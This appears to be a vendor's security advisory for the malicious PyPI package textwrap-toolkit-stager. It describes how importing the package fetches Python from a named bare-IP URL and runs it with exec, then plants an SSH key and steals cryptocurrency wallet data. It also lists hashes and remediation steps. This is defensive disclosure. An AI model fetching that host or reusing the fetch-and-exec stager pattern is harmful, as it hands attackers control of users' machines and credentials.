Which versions of textwrap-toolkit-stager are malicious?

The following PyPI versions of textwrap-toolkit-stager are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate textwrap-toolkit-stager if I installed it?

Remove textwrap-toolkit-stager from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is textwrap-toolkit-stager part of a known attack campaign?

Yes — textwrap-toolkit-stager is associated with the IN-MAL-2026-006244, 2026-06-textwrap-toolkit-stager, IN-MAL-2026-006243 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect textwrap-toolkit-stager in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking textwrap-toolkit-stager and packages like it before any post-install script runs.

Malicious package

textwrap-toolkit-stagerPyPI

Malicious code in textwrap-toolkit-stager (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5722

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall textwrap-toolkit-stager

What this malware does

On import textwrap_toolkit_stager, the package's __init__.py unconditionally fetches Python source from http://194.5.152.9:8080/hacks/textwrap-toolkit/textwrap_toolkit/__init__.py via urllib.request.urlopen and passes the response bytes directly to exec(code_bytes, {"__name__": "__main__"}). The fetch uses a bare IP over plaintext HTTP, with no version pinning, no hash verification, and errors silently swallowed. Any process that imports this package executes attacker-controlled Python code from 194.5.152.9 with the full privileges of the importing user. The package's advertised purpose ('lightweight utility for advanced text wrapping') has no implementation in the shipped code — the module's sole behavior is the remote stager. The package name itself self-describes the intent ('stager').

During import, package downloads and executes an obfuscated script. The code then adds a new authorized SSH key and reports back the IP of the current environment. After that, the code also attempts to exfiltrate cryptocurrency wallet data

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-textwrap-toolkit-stager

Reasons (based on the campaign):

backdoor
obfuscation
Downloads and executes a remote malicious script.
crypto-related
exfiltration-crypto

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

4437efa58f3f2d623e1f838fae81387714723d9a9f001a22761add0dab13cdce

14493be47d247105b710bad8f013da1d30199190d7f65b765f587b6c82002e75

9fc85924d5672f7c91c2dd5e97c46cc48e3ae48084f906b7b0ba9d606c433fa4

b5c75bdcf659eb0064e71470edd2140960c88803c906fcc5a4c9ec21b970e887

Frequently asked questions

No. textwrap-toolkit-stager on PyPI has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-0062442026-06-textwrap-toolkit-stagerIN-MAL-2026-006243

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · reporter

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection